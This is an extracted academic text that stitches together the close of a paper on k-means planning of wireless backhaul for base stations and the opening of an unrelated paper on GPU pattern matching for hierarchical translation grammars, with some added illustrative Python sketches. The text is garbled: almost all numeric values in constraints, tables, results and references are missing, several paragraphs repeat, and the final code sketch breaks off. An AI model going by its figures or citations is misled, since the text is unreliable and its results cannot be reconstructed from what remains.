in combination with table ii, satellite cost > host-station cost > sub-station cost. to lower the overall cost of the wireless return part of the network, we first need to minimize the number of satellites, that is, to let as many host stations as possible share one satellite; secondly, the number of host stations should be kept as small as possible. since a butterfly station has one more sector than a ruralstar station, can accept more sub-stations, and covers a wider range, butterfly stations should be selected as host stations wherever possible. in practice, sites are usually deployed by partition. following the ideas of "division", "local optimality" and "step-by-step optimization", we first use the k-means clustering algorithm to divide all sites into k classes, each class belonging to one satellite; each class is then divided into n host-station groups, and a mathematical model relating k, n and cost is established. within each group, the butterfly site closest to the centroid is chosen as the host station, and we then judge whether the positions of the remaining sites (the sub-stations) relative to the host station satisfy the distance constraints; the connection relations from the host station to the sub-stations are traversed, the connection path with the widest coverage is selected, and a lower-cost scheme is obtained. by analogy, if a plane carrying a large number of passengers is replaced by a small passenger plane, some passengers overflow and cannot board because of the seat limit; in the same way, sub-stations that exceed a host station's capacity cannot be attached, and the grouping must be adjusted.
for path loss, only the return part of the sub-stations is considered, not the path loss between host stations, which only needs to satisfy the distance limit. a smaller path loss can therefore be achieved by increasing the number of host stations: when the number of host stations is largest, the path loss is smallest, but the cost required for satellite transmission also increases. if the effective wireless return distance is limited, that is, the distance between a sub-station and its host station and between sub-stations is limited, then in theory a low path loss can be obtained. using the idea of "working backwards from the results", the model is modified, the modified station model is deduced, and the lowest-cost scheme, namely the optimal solution of the problem, is finally screened out.
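the cost and loss quantities used in this analysis are simple to compute once a topology is fixed. the following python sketch is illustrative only and is not part of the original paper: the unit prices and the default carrier frequency are placeholders because the numeric values did not survive extraction, the per-satellite capacity of eight host stations is taken from the constraints in the next subsection, and 32.45/20/20 are the constants of the standard free-space path-loss model with d in km and f in mhz.

```python
import math

def network_cost(n_host, n_sub, c_host, c_sub, c_sat, hosts_per_sat=8):
    """total and average cost of a fixed topology.

    c_host, c_sub, c_sat are the unit prices of a host station, a sub-station and
    a satellite (placeholder parameters); one satellite serves at most hosts_per_sat
    host stations, so the number of satellites is ceil(n_host / hosts_per_sat)."""
    n_sat = math.ceil(n_host / hosts_per_sat)
    total = n_host * c_host + n_sub * c_sub + n_sat * c_sat
    return total, total / (n_host + n_sub)      # average cost per site in the region

def path_loss_db(d_km, f_mhz=1800.0):
    # free-space propagation model used to estimate the loss between two stations;
    # the default frequency is an assumed placeholder value
    return 32.45 + 20 * math.log10(d_km) + 20 * math.log10(f_mhz)

def average_system_loss(link_distances_km, f_mhz=1800.0):
    # average path loss over all wireless return links (host-sub and sub-sub)
    return sum(path_loss_db(d, f_mhz) for d in link_distances_km) / len(link_distances_km)
```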
2) problem model establishment
a) establishment of the objective function
total cost = number of host stations × host-station cost + number of sub-stations × sub-station cost + number of satellites × satellite cost. the number of satellites equals ceil(number of host stations / capacity of one satellite), where ceil() rounds up. writing the unit costs as c1, c2 and c3, the objective is
min c = c1·x + c2·y + c3·z
where c represents the total cost under the topology, x the number of host stations, y the number of sub-stations, and z the number of satellites.
table ii. costs of the various transmission modes (w usd): host station, child station, satellite.
b) establishment of the constraint conditions:
• the distance of the first hop is at most km, and that of each subsequent hop is at most km.
• sites include two different station types, ruralstar and butterfly; a ruralstar station contains one sector in total and a butterfly station contains two sectors. if the site is a host station, the maximum number of first-level sub-stations per sector is bounded, and the total number of sub-stations is bounded. to simplify the problem, the sector coverage direction of the butterfly station is not considered for the moment.
• microwave connection is adopted between host stations, with a maximum communication distance of km.
• wireless return connection is adopted between host station and sub-station and between sub-stations.
• each sub-station can have at most two wireless return links.
• any sub-station can only belong to one host station, there is only one path to the host station, and the number of hops contained in the path is bounded.
• any host station has one and only one satellite responsible for its return transmission; host stations connected in the same piece can share the same satellite, but a satellite can only bear the return data of eight host stations at most.
• within a single piece, there is no upper limit on the total number of host stations.
written with the symbols of table i, the constraint conditions are:
s.t.  fd ≤ the first-hop distance limit;
      nd ≤ the subsequent-hop distance limit;
      rxi and fxi each serve no more than their allowed numbers of sub-stations y;
      wl(xi, xj) ≤ km for microwave links between host stations;
      wbl(yi, yj) holds for every wireless return link, with at most two links per sub-station;
      js(yi) ≤ the maximum hop count from sub-station yi to its host station;
      z = ceil(x / 8).
c) establishment of the model
based on the above analysis, a model in which the lowest overall cost has the highest priority is established: minimize c = c1·x + c2·y + c3·z subject to the same constraint conditions.
iii. k-means algorithm
cluster analysis is an important analysis method in data mining. its goal is to divide the data set into several clusters so that the similarity of data points within the same cluster is as large as possible, while the similarity of data points between different clusters is as small as possible. the study of clustering algorithms has a long history: hartigan systematically discussed clustering algorithms in his monograph "clustering algorithms" as early as 1975. since then, the academic community has proposed a variety of clustering algorithms based on different ideas, mainly including partition-based, hierarchy-based, density-based, grid-based and model-based algorithms. all of these algorithms can achieve a good clustering effect, and among them the partition-based k-means algorithm is the one that is applied most and has a simple algorithmic idea.
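to make the partition step concrete, here is a minimal python sketch of the standard lloyd-style k-means iteration that the processing flow in the next subsection describes: assign every site to its nearest centroid, then recompute each centroid as the mean of its cluster. it is illustrative only; the function name and the random initialization are assumptions, not the authors' implementation.

```python
import random

def kmeans(points, k, n_iter=100, seed=0):
    """plain lloyd-style k-means over 2-d site coordinates."""
    rng = random.Random(seed)
    centroids = rng.sample(points, k)              # k random sites as initial centroids
    clusters = [[] for _ in range(k)]
    for _ in range(n_iter):
        clusters = [[] for _ in range(k)]
        # assignment step: each site joins the cluster of its nearest centroid
        for x, y in points:
            j = min(range(k),
                    key=lambda c: (x - centroids[c][0]) ** 2 + (y - centroids[c][1]) ** 2)
            clusters[j].append((x, y))
        # update step: recompute each centroid as the mean of its cluster
        new_centroids = [
            (sum(p[0] for p in cl) / len(cl), sum(p[1] for p in cl) / len(cl)) if cl
            else centroids[j]
            for j, cl in enumerate(clusters)
        ]
        if new_centroids == centroids:             # stop when no centroid moves
            break
        centroids = new_centroids
    return centroids, clusters

# example: split candidate sites into k regions, then re-run k-means inside each
# region to form host-station groups, as the planning model does
sites = [(random.random() * 10, random.random() * 10) for _ in range(200)]
region_centroids, region_members = kmeans(sites, k=4)
```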
by dealing with the difficult constraints separately, the k-means algorithm makes the solution of the problem relatively easy. the algorithm converges well, and its solution speed can also meet real-time requirements.
a. processing flow of the k-means algorithm
1) for a randomly given set of sites, the samples are divided into k clusters according to the distances between sites. suppose the cluster division is (b1, b2, ..., bk); our goal is then to minimize the squared error
e = Σ_{i=1..k} Σ_{x∈bi} ||x − μi||²
where μi is the mean vector of cluster bi, called the centroid:
μi = (1/|bi|) Σ_{x∈bi} x
a suitable range of k values was selected through cross-validation, and k samples are randomly selected from the data set as the initial centroid vectors {μ1, μ2, ..., μk}.
2) take n as the maximum number of iterations. for n = 1, 2, ..., n:
a) initialize the cluster division bt = ∅ for t = 1, ..., k;
b) for i = 1, ..., m, calculate the distance dij = ||xi − μj|| between sample xi and each centroid μj (j = 1, ..., k), label xi with the category whose dij is smallest, and add xi to that cluster;
c) for j = 1, ..., k, recalculate the new centroid μj of all the sample points in bj;
d) if none of the k centroid vectors changes, go to step 3).
3) output the cluster division c = {c1, c2, ..., ck}.
iv. simulation experiment
a. cost modelling experiment
the specific steps for solving the model are as follows:
step 1: use the k-means algorithm to aggregate the data and brute-force the difficult constraints, obtaining a bound on the original problem, that is, the solution that minimizes the overall cost when the other constraints are ignored;
step 2: solving the lowest-overall-cost model with the highest priority, use the k-means algorithm again to aggregate the data in each classified sub-region and, taking the other constraints into account, obtain the number of host stations in each sub-region;
step 3: if the obtained solution satisfies the conditions of the optimal solution, stop the algorithm and add up the numbers in each cell; the result is the optimal solution of the problem. otherwise go back to step 2.
the topology structure satisfying the constraint conditions is obtained through steps 1–3. taking the chosen k and an adjustable cell radius (in km) as an example, the resulting topology is shown in figure 2: the green "o" marks a host station, the blue "*" marks a sub-station, and the black line segments mark the connections between stations.
figure 2. base station topology
step 4: for the optimal solution obtained in each sub-region, output the minimum-cost result through the overall cost formula. the resulting numbers of host stations, sub-stations and satellites, the total cost (w usd) and the average cost (w usd) are shown in figure 3; the algorithm runs quickly and converges strongly.
figure 3. program run result
for comparison, several cell radii were chosen and the corresponding site distributions, station counts and total costs were obtained; see table iii.
table iii. cost comparison for the compared cell radii (km): number of host stations, number of sub-stations, number of satellites, and overall cost (w usd).
by comparison, the overall cost is lowest for one of the compared cell radii, which gives the minimum cost (w usd). the larger the radius, the more stations are left untreated; however, even for the largest radius, the number of stations left unconnected is negligible and can be ignored.
b. path loss modelling experiment
according to the simulation results of the cost model, the connection relations and physical locations of host stations and sub-stations are obtained. if only the path loss of the sub-station return part is taken into account, and the path loss between host stations is ignored (it only needs to meet the distance limit), a smaller path loss can be achieved by increasing the number of host stations: when x is largest, pl is smallest, but the cost required for satellite transmission also increases. if the first- and second-hop distances are limited, that is, the distances between sub-station and host station and between sub-stations are reduced, a lower path loss is obtained. if there are only first-level sub-stations, the number of sub-stations in a single sector of the host station is required not to exceed its limit, and the modified sub-station model is then deduced in reverse; finally, the scheme with the lowest cost is selected, that is, the optimal solution of the problem.
although wireless return transmission is affected by non-line-of-sight (nlos) conditions, the free-space transmission model is adopted to estimate the path loss between stations in order to simplify the problem:
pl = 32.45 + 20·lg(d) + 20·lg(f)
where pl is the path loss, d is the distance between the two stations in km, and f is the transmission frequency in mhz (the default constant value is used here). the average system loss (apl) equals the sum of the losses of all wireless return links divided by the number of wireless return links. it should be noted that the path loss only considers the return part of the sub-stations; microwave transmission is adopted between host stations, and its loss is not counted as long as the distance limit is satisfied.
for comparison, three first-hop/second-hop distance combinations were selected, and the corresponding numbers of sites and average losses were obtained; see table iv.
table iv. number of sites and average loss for each first-hop/second-hop combination: host stations, sub-stations, satellites, average loss (db).
reducing the first-hop and second-hop distances reduces the average loss, so the combination with the smallest hop distances is the best choice when only loss is considered. however, the number of sites not connected to the topology then increases, the signal coverage decreases, and the cost is very high. to sum up, if only cost is considered, the best solution is the adjustable constraint radius that gives the lowest overall cost in table iii; if only loss is considered, the chosen k together with the smallest first-hop and second-hop distances is the best scheme.
v. summary
in this paper, a locally optimal model based on the k-means algorithm is constructed. by traversing and comparing the deployments of host stations and sub-stations under global large clustering and local small clustering, the lowest-cost sub-station scheme is screened out.
the establishment of the model adopts the idea of "dividing the whole into zero" and applies the k-means algorithm. due to the scalability and high efficiency of the algorithm itself, it can simply and quickly divide candidate sites into k parts for step-by-step solution, which significantly reduces the amount of calculation and improves the speed of operation. however, because the k value is predetermined, the selection of this k value is very difficult to estimate, and the one- time optimal programming cannot be realized. in addition, due to the clustering division of the overall site, the final solution of the model is always locally optimal, which may be slightly different from the overall optimal solution. therefore, the initial value of k is limited in the modeling process. let k be between and , and solve different k values for many times, so as to obtain the relative optimal solution by comparison. after getting the lower cost of the substation scheme, considering the return path loss of the substation, the established local optimal model is modified from the perspective of reducing the loss. considering the results, microwave connection is adopted between the host stations and no loss is calculated. the average loss of the system is related to the wireless return distance, so the algorithm efficiency is significantly improved by limiting the distance between stations. however, the limitation of this model lies in the increase of host station and the increase of overall cost. although it is beneficial to the service quality of users, it increases the cycle of investment return, which is not in line with the original intention of operators. in order to take into account the interests of operators, follow-up can be adjusted according to the situation. references [ ] ma liang . wireless relay transmission technology in the micro base station deployment strategy [j]. journal of mobile communications, , ( ) : to . [ ] li xin, peng xiongen. deployment and application of relay technology in lte network [j]. mobile communications, , ( ): - . international journal of advanced network, monitoring and controls volume , no. , [ ] deng shuifa. research on los/nlos communication environment identification and nlos error elimination technology [d]. southwest jiaotong university, . [ ] wang bo. wideband lineless communication system in nlos field scene without apparent distance [j]. digital communication world, ( ): - . [ ] liu sen. analysis on the return rate of investment in enterprise cloud computing information [j]. china science and technology bbs, ( ): - . [ ] zhang yong-jun, yao zhi-cong, wang jing, li hua-hua. capacitor voltage balance control strategy of a cascade h-bridge static reactive power generator [j]. chinese journal of electrical engineering, , ( ): - . [ ] wu huayi, liu bo, li dajun, ling nanyan. research review on topological relations of spatial objects [j]. journal of wuhan university (information science edition), , ( ): - . [ ] shi langyu, ma ling. application of relay wireless back transmission technology in td-lte networking scheme [j]. telecommunications engineering technology and standardization, , ( ): - . [ ] xie j y, gao h c. selection algorithm based on statistical correlation and k-means to distinguish gene subset [j]. journal of software, ( ): - . (in chinese) [ ] zuo l, he y g, li b, zhu y q, fang g f. research on path loss of passive uhf rfid system [j]. acta phys. sin, , ( ): - . (in chinese) [ ] jia h j, ding s f, shi z z. 
approximate weighted kernel k-means algorithm for solving large-scale spectral clustering [j]. journal of software, , ( ): - . (in chinese)

gappy pattern matching on gpus for on-demand extraction of hierarchical translation grammars
hua he, dept. of computer science, university of maryland, college park, maryland, huah@cs.umd.edu
jimmy lin, the ischool and umiacs, university of maryland, college park, maryland, jimmylin@umd.edu
adam lopez, school of informatics, university of edinburgh, edinburgh, united kingdom, alopez@inf.ed.ac.uk
abstract
grammars for machine translation can be materialized on demand by finding source phrases in an indexed parallel corpus and extracting their translations. this approach is limited in practical applications by the computational expense of online lookup and extraction. for phrase-based models, recent work has shown that on-demand grammar extraction can be greatly accelerated by parallelization on general purpose graphics processing units (gpus), but these algorithms do not work for hierarchical models, which require matching patterns that contain gaps. we address this limitation by presenting a novel gpu algorithm for on-demand hierarchical grammar extraction that is at least an order of magnitude faster than a comparable cpu algorithm when processing large batches of sentences. in terms of end-to-end translation, with decoding on the cpu, we increase throughput by roughly two thirds on a standard mt evaluation dataset. the gpu necessary to achieve these improvements increases the cost of a server by about a third. we believe that gpu-based extraction of hierarchical grammars is an attractive proposition, particularly for mt applications that demand high throughput.
introduction
most machine translation systems extract a large, fixed translation model from parallel text that is accessed from memory or disk.
an alternative is to store the indexed parallel text in memory and extract translation units on demand only when they are needed to decode new input. this architecture has several advantages: it requires only a few gigabytes to represent a model that would otherwise require a terabyte (lopez, b). it can adapt incrementally to new training data (levenberg et al., ), making it useful for interactive translation (gonzález-rubio et al., ). it supports rule extraction that is sensitive to the input sentence, enabling leave-one-out training (simianer et al., ) and the use of sentence similarity features (philips, ). on-demand extraction can be slow, but for phrase-based models, massive parallelization on general purpose graphics processing units (gpus) can dramatically accelerate performance. he et al. ( ) demonstrated orders of magnitude speedup in exact pattern matching with suffix arrays, the algorithms at the heart of on-demand extraction (callison-burch et al., ; zhang and vogel, ). however, some popular translation models use "gappy" phrases (chiang, ; simard et al., ; galley and manning, ), and the gpu algorithm of he et al. does not work for these models since it is limited to contiguous phrases. instead, we need pattern matching and phrase extraction that is able to handle variable-length gaps (lopez, ). this paper presents a novel gpu algorithm for on-demand extraction of hierarchical translation models based on matching and extracting gappy phrases. our experiments examine both grammar extraction and end-to-end translation, comparing quality, speed, and memory use. we compare against the gpu system for phrase-based translation by he et al. ( ) and cdec, a state-of-the-art cpu system for hierarchical translation (dyer et al., ). our system outperforms the former on translation quality by . bleu (replicating previously-known results) and outperforms the latter on speed, improving grammar extraction throughput by at least an order of magnitude on large batches of sentences while maintaining the same level of translation quality. our contribution is to show, complete with an open-source implementation, how gpus can vastly increase the speed of hierarchical grammar extraction, particularly for high-throughput mt applications.
algorithms
gpu architectures, which are optimized for massively parallel operations on relatively small streams of data, strongly influence the design of our algorithms, so we first briefly review some key properties. our nvidia tesla k c gpu (kepler generation) provides thread processors (cuda cores), and computation proceeds concurrently in groups of threads called warps. each thread in a warp carries out identical instructions in lockstep. when a branching instruction occurs, only threads meeting the branch condition execute, while the rest idle—this is called warp divergence and is a source of poor performance. consequently, gpus are poor at "irregular" computations that involve conditionals, pointer manipulation, and complex execution sequences. our pattern matching algorithm is organized around two general design principles: brute force scans and fine-grained parallelism. brute force array scans avoid warp divergence since they access data in regular patterns. rather than parallelize larger algorithms that use these scans as subroutines, we parallelize the scans themselves in a fine-grained manner to obtain high throughput. the relatively small size of the gpu memory also affects design decisions. data transfer between the gpu and the cpu has high latency, so we want to avoid shuffling data as much as possible. to accomplish this, we must fit all our data structures into the gb memory available on our particular gpu. as we will show, this requires some tradeoffs in addition to careful design of algorithms and associated data structures.
translation by pattern matching
lopez ( b) provides a recipe for "translation by pattern matching" that we use as a guide for the remainder of this paper (algorithm 1).
algorithm 1 — translation by pattern matching
1: for each input sentence do
2:     for each phrase in the sentence do
3:         find its occurrences in the source text
4:         for each occurrence do
5:             extract any aligned target phrase
6:     for each extracted phrase pair do
7:         compute feature values
8:     decode as usual using the scored rules
we encounter a computational bottleneck in the inner loops of algorithm 1, since there are many query phrases, matching occurrences, and extracted phrase pairs to process. below, we tackle each challenge in turn. to make our discussion concrete, we will use a toy english-spanish translation example. at line 3 we search for phrases in the source side of a parallel text. suppose that it contains two sentences: it makes him and it mars him, and it sets him on and it takes him off. we map each unique word to an integer id, and call the resulting array of integers that encodes the source text under this transformation the text t. let |t| denote the total number of tokens, t[i] denote its ith element, and t[i]...t[j] denote the substring starting with its ith element and ending with its jth element. since t encodes multiple sentences, we use special tokens to denote the end of a sentence and the end of the corpus. in our example we use # and $, respectively, as shown in figure 1. now suppose we want to translate the sentence it persuades him and it disheartens him. we encode it under the same mapping as t and call the resulting array the query q. our goal is to materialize all of the hierarchical phrases that could be used to translate q based on training data t. our algorithm breaks this process into a total of fourteen distinct passes, each performing a single type of computation in parallel. five of these passes are based on the algorithm described by he et al. ( ), and we review them for completeness. the nine new passes are identified as such.
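as a concrete illustration of the encoding just described, the short python sketch below builds the integer-encoded text t for the toy corpus, with # separating sentences and $ closing the corpus, and encodes a query under the same mapping. it is not from the paper; the function names are illustrative assumptions.

```python
def encode_corpus(sentences, eos="#", eoc="$"):
    """integer-encode a tokenized corpus into the array t used by the pattern matcher;
    '#' marks sentence boundaries and '$' the end of the corpus."""
    vocab = {}

    def tid(w):
        return vocab.setdefault(w, len(vocab))

    t = [tid(eos)]
    for sent in sentences:
        t.extend(tid(w) for w in sent.split())
        t.append(tid(eos))
    t.append(tid(eoc))
    return t, vocab

def encode_query(sentence, vocab, unk=-1):
    # the query is encoded under the same mapping as t; unseen words can never match
    return [vocab.get(w, unk) for w in sentence.split()]

t, vocab = encode_corpus(["it makes him and it mars him",
                          "it sets him on and it takes him off"])
q = encode_query("it persuades him and it disheartens him", vocab)
```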
rather than parallelize larger algorithms that use these scans as subroutines, we parallelize the scans themselves in a fine-grained manner to obtain high throughput. the relatively small size of the gpu memory also affects design decisions. data transfer between the gpu and the cpu has high latency, so we want to avoid shuffling data as much as possible. to accomplish this, we must fit all our data structures into the gb memory available on our particular gpu. as we will show, this requires some tradeoffs in addition to careful design of algorithms and associated data structures. . translation by pattern matching lopez ( b) provides a recipe for “translation by pattern matching” that we use as a guide for the remainder of this paper (algorithm ). algorithm translation by pattern matching : for each input sentence do : for each phrase in the sentence do : find its occurrences in the source text : for each occurrence do : extract any aligned target phrase : for each extracted phrase pair do : compute feature values : decode as usual using the scored rules we encounter a computational bottleneck in lines – , since there are many query phrases, matching occurrences, and extracted phrase pairs to process. below, we tackle each challenge in turn. to make our discussion concrete, we will use a toy english-spanish translation example. at line we search for phrases in the source side of a parallel text. suppose that it contains two sentences: it makes him and it mars him, and it sets him on and it takes him off. we map each unique word to an integer id, and call the resulting array of integers that encodes the source text under this transformation the text t . let |t| denote the total number of tokens, t[i] denote its ith element, and t[i]...t[j] denote the substring starting with its ith element and ending with its jth element. since t encodes multiple sentences, we use special tokens to denote the end of a sentence and the end of the corpus. in our example we use # and $, respectively, as shown in figure . now suppose we want to translate the sentence it persuades him and it disheartens him. we encode it under the same mapping as t and call the resulting array the query q. our goal is to materialize all of the hierarchical phrases that could be used to translate q based on training data t . our algorithm breaks this process into a total of distinct passes, each performing a single type of computation in parallel. five of these passes are based on the algorithm described by he et al. ( ), and we review them for completeness. the nine new passes are identified as such. 
i t[i] # it makes him and it mars him # it sets him on and it takes him off # $ st [i] suffix st [i]: t[st [i]]...t[|t|] and it mars him # it sets him on and it takes him off # $ and it takes him off # $ him and it mars him # it sets him on and it takes him off # $ him off # $ him on and it takes him off # $ him # it sets him on and it takes him off # $ it makes him and it mars him # it sets him on and it takes him off # $ it mars him # it sets him on and it takes him off # $ it sets him on and it takes him off # $ it takes him off # $ makes him and it mars him # it sets him on and it takes him off # $ mars him # it sets him on and it takes him off # $ off # $ on and it takes him off # $ sets him on and it takes him off # $ takes him off # $ # it makes him and it mars him # it sets him on and it takes him off # $ # it sets him on and it takes him off # $ # $ $ figure : example text t (showing words rather than than their integer encodings for clarity) and suffix array st with corresponding suffixes. . finding every phrase line of algorithm searches t for all occurrences of all phrases in q. we call each phrase a pattern, and our goal is to find all phrases of t that match each pattern, i.e., the problem of pattern matching. our translation model permits phrases with at most two gaps, so q is a source of o(|q| ) patterns, since there are up to six possible subphrase boundaries. passes - : finding contiguous patterns to find contiguous phrases (patterns without gaps), we use the algorithm of he et al. ( ). it requires a suffix array (manber and myers, ) computed from t . the ith suffix of a -indexed text t is the substring t[i]...t[|t |] starting at position i and continuing to the end of t . the suffix array st is a permutation of the integers , ..., |t | ordered by a lexicographic sort of the corresponding suffixes (figure ). given st , finding a pattern p is simply a matter of binary search for the pair of integers (`,h) such that for all i from ` to h, p is a prefix of the st [i]th suffix of t . thus, each integer st [i] identifies a unique match of p . in our example, the pattern it returns ( , ), corresponding to matches at positions , , , and ; while him and it returns ( , ), corresponding to a match at position . a longest common prefix (lcp) array enables us to find h or ` in o(|q|+ log |t|) comparisons (manber and myers, ). every substring of q is a contiguous pattern, but if we searched t for all of them, most searches would fail, wasting computation. instead, he et al. ( ) use two passes. the first computes, concurrently for every position i in , ..., |q|, the endpoint j of the longest substring q[i]...q[j] that appears in t . it also computes the suffix array range of the one- word substring q[i]. taking this range as input, for all k from i to j the second pass concurrently queries t for pattern q[i]...q[k]. this pass uses two concurrent threads per pattern—one to find the lowest index of the suffix array range, and one to find the highest index. passes - : finding one-gap patterns (new) passes and find contiguous phrases, but we must also find phrases that contain gaps. we use the special symbol ? to denote a variable-length gap. the set of one-gap patterns in q thus consists of q[i]...q[j] ? q[i′]...q[j′] for all i, j, i′, and j′ such that i ≤ j < i′ − and i′ ≤ j′. when the position in q is not important we use strings u, v, and w to denote contiguous patterns; for example, u ? v denotes an arbitrary one-gap pattern. we call the contiguous strings u and v of u ? 
v its subpatterns, e.g., it ? him is a pattern with subpatterns it and him. when we search for a gappy pattern, ? can match any non-empty substring of t that does not contain $ or #. such a match may not be uniquely identified by the index of its first word, so we specify it with a tuple of indices, one for the match of each subpattern. pattern it ? him has six matches in t : ( , ), ( , ), ( , ), ( , ), ( , ), and ( , ). passes and search t for all one-gap patterns using the novel gpu algorithm described below. a pattern u ? v cannot match in t unless both u and v match in t , so we use the output of pass , which returns all (i,j) pairs such that q[i]...q[j] matches in t . concurrently for every such i and j, pass enumerates all i′ and j′ such that j < i′ − and q[i′]...q[j′] matches in t , returning each pattern q[i]...q[j] ? q[i′]...q[j′]. pass then sorts and deduplicates the combined results of all threads to obtain a set of unique patterns. these operations are carried out on the gpu using the algorithms of hoberock and bell ( ). pass searches for matches of each pattern iden- tified by pass . we first illustrate with it ? him. pass associates it with suffix array range ( , ). a linear scan of st in this range reveals that it matches at positions , , , and in t . likewise, him maps to range ( , ) of st and matches at , , , and in t . concurrently for each match of the less frequent subpattern, we scan t to find matches of the other subpattern until reaching a sentence boundary or the maximum phrase length, an idea we borrow from the cpu implementation of baltescu and blunsom ( ). in our example, both it and him occur an equal number of times, so we arbitrarily choose one—suppose we choose it. we assign each of positions , , , and to a separate thread. the thread assigned position scans t for matches of him until the end of sentence at position , finding matches ( , ) and ( , ). as a second example, consider it ? and. in this case, it has four matches, but and only two. so, we need only two threads, each scanning backwards from matches of and. since most patterns are infrequent, allocating threads this way minimizes work. however, very large corpora contain one-gap patterns for which both subpatterns are frequent. we simply precompute all matches for these patterns and retrieve them at runtime, as in lopez ( ). this precomputation is performed once given t and therefore it is a one-time cost. materializing every match of u ? v would con- sume substantial memory, so we only emit those for which a translation of the substring matching ? is extractable using the check in § . . the success of this check is a prerequisite for extracting the translation of u ? v or any pattern containing it, so pruning in this way conserves gpu memory without affecting the final grammar. passes - : finding two-gap patterns (new) we next find all patterns with two gaps of the form u?v ?w. the search is similar to passes and . in pass , concurrently for every pattern u ? v matched in pass , we enumerate the pattern u?v?w for every w such that u?v?w is a pattern in q and w matched in pass . in pass , concurrently for every match (i,j) of u?v for every u?v ?w enumerated in pass , we scan t from position j + |v| + for matches of w until we reach the end of sentence. as with the one-gap patterns, we apply the extraction check on the second ? of the two-gap patterns u ? v ? w to avoid needlessly materializing matches that will not yield translations. . 
extracting every target phrase in line of algorithm we must extract the aligned translation of every match of every pattern found in t . efficiency is crucial since some patterns may occur hundreds of thousands of times. we extract translations from word alignments using the consistency check of och et al. ( ). a pair of substrings is consistent only if no word in either substring is aligned to any word outside the pair. for example, in figure the pair (it sets him on, los excita) is consistent. the pair (him on and, los excita y) is not, because excita also aligns to the words it sets. only consistent pairs can be lo s ex ci ta y lo s pa ra li za l r p # it sets him on and it takes him off l′ r′ figure : an example alignment and the corre- sponding l, r, p , l′ and r′ arrays. translations of each other in our model. given a specific source substring, our algorithm asks: is it part of a consistent pair? to answer this question, we first compute the minimum target substring to which all words in the substring align. we then compute the minimum substring to which all words of this candidate translation align. if this substring matches the input, the candidate transla- tion is returned; otherwise, extraction fails. for example, it sets him on in range ( , ) aligns to los excita in range ( , ), which aligns back to ( , ). so this is a consistent pair. however, him on and in range ( , ) aligns to los excita y in range ( , ), which aligns back to it sets him on and at ( , ). so him on and is not part of a consistent pair and has no extractable translation. to extract gappy translation units, we subtract consistent pairs from other consistent pairs (chiang, ). for example, (him, los) is a consistent pair. subtracting it from (it sets him on, los excita) yields the translation unit (it sets ? on, ? excita). our basic building block is the extract func- tion of he et al. ( ), which performs the above check using byte arrays denoted l, r, p , l′, and r′ (figure ) to identify extractable target phrases in target text t ′. when t[i] is a word, l[i] and r[i] store the sentence-relative positions of the leftmost and rightmost words it aligns to in t ′, and p[i] stores t[i]’s sentence-relative position. when t[i] is a sentence boundary, the concatenation of bytes l[i], r[i], and p [i], denoted lrp[i], stores the position of the corresponding sentence in t ′. bytes l′[i′] and r′[i′] store the sentence-relative positions of the leftmost and rightmost words t ′[i′] aligns to. we first calculate the start position p of the source sentence containing t[i]...t[j], and the start posi- tion p′ of the corresponding target sentence: p = i−p [i] p′ = lrp[p] we then find target indices i′ and j′ for the candidate translation t ′[i′]...t ′[j′]: i′ = p′ + min k∈i,...,j l[k] j′ = p′ + max k∈i,...,j r[k] we can similarly find the translation t[i′′]...t[j′′] of t ′[i′]...t ′[j′]: i′′ = p + min k′∈i′,...,j′ l′[k′] j′′ = p + max k′∈i′,...,j′ r′[k′] if i = i′′ and j = j′′, extract(i,j) returns (i′,j′), the position of t[i]...t[j]’s translation. otherwise the function signals that there is no extractable translation. given this function, extraction proceeds in three passes. pass : extracting contiguous patterns each match of pattern u is assigned to a concurrent thread. the thread receiving the match at position i returns the pair consisting of u and its translation according to extract(i, i + |u| − ), if any. it also returns translations for patterns in which u is the only contiguous subpattern: ? u, u ?, and ? u ?. 
we extract translations for these patterns even if u has no translation itself. to see why, suppose that we reverse the translation direction of our example. in figure , excita is not part of a consistent pair, but both ? excita and ? excita ? are. consider ? u. since ? matches any substring in t without boundary symbols, the leftmost position of ? u is not fixed. so, we seek the smallest match with an extractable translation, returning its translation with the following algorithm. : k ← i : while t[k − ] = # do : k ← k − : if extract(k,i + |u|− ) succeeds then : (i′,j′) ← extract(k,i + |u|− ) : if extract(k,i− ) succeeds then : (p′,q′) ← extract(k,i− ) : return t ′[i′]...t ′[p′] ? t ′[q′]...t ′[j′] : if t[k − ] = # then : return failure the case of u ? is symmetric. we extend this algorithm to handle ? u ?. the extension considers increasingly distant pairs (k,`) for which ? u ? matches t[k]...t[`], until it either finds an extractable translation, or it encounters both sentence boundaries and fails. pass : extracting one-gap patterns (new) in this pass, each match of pattern u ? v is assigned to a thread. the thread receiving match (i,j) attempts to assign i′,j′,p′ and q′ as follows. (i′,j′) = extract(i,j + |v|− ) (p′,q′) = extract(i + |u|,j − ) if both calls succeed, we subtract to obtain the translation t ′[i′]...t ′[p′] ?t ′[q′]...t ′[j′]. we extract translations for ? u ? v and u ? v ?, using the same algorithm as in pass . pass : extracting two-gap patterns (new) in this pass, we extract a translation for each match of u ? v ? w concurrently, using a straightforward extension of the subtraction algorithm in pass . since we only need patterns with up to two gaps, we do not consider other patterns. to optimize gpu performance, for the passes above, we assign all matches of a gappy pattern to the same thread block. this allows threads in the same thread block to share the same data during initialization, therefore improving memory access coherence. . computing every feature in line of algorithm we compute features of every extracted phrase pair. we use α and β to denote arbitrary strings of words and ? symbols, and our input is a multiset of (α,β) pairs collected by passes - , which we denote by Π. we compute the following features for each unique (α,β) pair. log-count features. we need two aggregate statis- tics: the count of (α,β) in Π, and the count of all pairs in Π for which α is the source pattern. we then compute the two features as log( + count(α,β)) and log( + count(α)). translation log-probability. given the aggregate counts above, this feature is log count(α,β)count(α) . singleton indicators. we compute two features, to indicate whether (α,β) occurs only once, i.e., count(α,β) = , and whether α occurs only once, i.e., count(α) = . lexical weight. consider word pairs a,b with a ∈ α, b ∈ β, and neither a nor b are ?. given a global word translation probability table p(a|b), which is exter- nally computed from the word alignments directly, the feature is ∑ a∈α maxb∈β log p(a|b). since Π is the result of parallel computation, we must sort it. we can then compute aggregate statis- tics by keeping running totals in a scan of the sorted multiset. with many instantiated patterns, we would quickly exhaust gpu memory, so this sort is performed on the cpu. we compute the log-count features, translation log-probability, and singleton indicators this way. 
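the aggregate features just described reduce to counting over the sorted multiset Π; the python sketch below shows the computation of the log-count, translation log-probability, and singleton features (the cpu-side part of the pipeline). it is illustrative only; the function name and data layout are assumptions, not the paper's implementation.

```python
import math
from collections import Counter

def aggregate_features(pairs):
    """pairs: iterable of (source_pattern, target_pattern) tuples, the multiset Π.
    returns the per-rule features defined in the text."""
    pair_count = Counter(pairs)                      # count(alpha, beta)
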